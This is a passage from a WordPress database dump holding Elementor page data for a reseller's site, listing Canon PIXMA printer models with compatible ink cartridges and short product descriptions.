width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX338<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX347<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX366<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX426<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX876<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX886<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-726 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-725 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-1<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-29 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Dark Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Light Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Yellow)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b7fc065\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"387b65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-10<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-72 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-100<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-42 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Light Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TR8570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS207<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS307<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS5070<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-771 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-770 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-770XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS5170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"736141f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9e8521a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS8270<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9170<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(6860,3293,'_elementor_version','2.5.14'),(6900,3299,'_elementor_edit_mode','builder'),(6863,3294,'_wp_page_template','template-fullwidth.php'),(6864,3294,'_elementor_edit_mode','builder'),(6865,3294,'_elementor_template_type','post'),(6866,3294,'_elementor_data','[{\"id\":\"9ac79cf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"2a109eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d59285\",\"elType\":\"widget\",\"settings\":{\"title\":\"Injet Printers :-\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca9ead8\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"9a9d292\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"align\":\"center\"},\"elements\":[{\"id\":\"6ad8678\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E560 \\/ E560R\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70128a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\",\"id\":2345}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"509ac9b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Advanced Wireless All-In-One with Auto Duplex\\u00a0<span style=\\\"font-size: 0.875rem;\\\">Printing for Low-Cost Printing<\\/span><\\/p><p>The Ink Efficient E560 \\/ E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.<\\/p><p>Available in Black and Red.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO Standard print speed (A4): up to 9.9ipm black \\/ 5.7ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi<\\/p><p>Recommended print volume: 80 - 400 pages<\\/p><p>\\u00a0<\\/p><p>\\u00a0<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center><p>\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"19ec1cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d3a1ece\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E4270\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"47167d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\",\"id\":2346}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"c56690e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing<\\/p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.<\\/p><p>Print, Scan, Copy, Fax<\\/p><p>ISO standard print speed (A4): 8.8ipm black \\/ 4.4ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct<\\/p><p>Recommended print volume: 50 - 200 pages<\\/p><p>\\u00a0<\\/p><p>\\u00a0<\\/p><p>\\u00a0<\\/p><center><\\/center><center><br \\/><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"11\\\" ]<\\/span><\\/center><p>\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"692b43d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a99e262\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS9570\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6a04479\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\",\"id\":2347}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ab42ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>A3 Wireless Photo Printer with Large 4.3\\u201d Touch-Screen and Auto Document Feeder<\\/p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless\\/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 80 - 300 pages<\\/p><p>&lt;center&gt;[maxbutton id=\\\"11\\\" ]&lt;\\/center&gt;<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"657c5e2\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1c9048c\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS8270\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e5da999\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\",\"id\":2348}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8c06b04\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless Photo All-In-One with Large 4.3\\u201d Touch-Screen and Auto Duplex Printing<\\/p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.<\\/p><p>Available in Black, Red and White.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 30 - 100 pages<\\/p><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e19c5ed\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"48b8328\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"619d0d9\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G2010\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b641ed3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\",\"id\":2349}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"cb6e9e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ef95652\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"72caeea\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA 